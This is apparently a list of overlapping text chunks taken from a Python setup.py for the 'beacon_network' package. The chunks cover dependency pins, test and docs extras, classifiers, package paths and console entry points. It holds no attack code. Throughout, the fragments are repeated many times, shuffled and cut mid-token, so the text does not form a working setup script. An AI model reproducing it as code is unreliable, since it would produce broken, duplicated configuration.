[\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\",", "\"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ],", "Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\",", "setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\",", "\"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\",", "\"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={", "}, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3 -", "Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\",", "Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic", "setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC", "], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\",", "\"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"],", "\"gunicorn==20.1.0\", ], 
extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\",", ":: OSI Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\",", "], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\":", "package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version <", "- IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended", "IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience", "\"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\",", "'3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\",", ":: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\",", "\"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\",", "\"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\",", ":: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI", "for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\",", "\"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\",", "License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\",", "\"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3", "], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version", ":: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache", "\"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\":", "OSI Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\", ],", "version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center", "Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended 
Audience ::", "name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT", "\"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\",", "Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\",", "\"License :: OSI Approved :: Apache Software License\", \"Programming Language :: Python ::", "packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\",", "python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\",", "\"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"], },", "\"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\",", "description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for", "[ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\":", "\"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx", "project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status", "], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"], }, )", "\"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >=", "'3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\",", "Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet ::", "install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version", "Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[", "\"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License", "- Beta\", \"Intended Audience :: Developers\", 
\"Topic :: Internet :: WWW/HTTP :: HTTP", "3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP ::", "\"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet" ]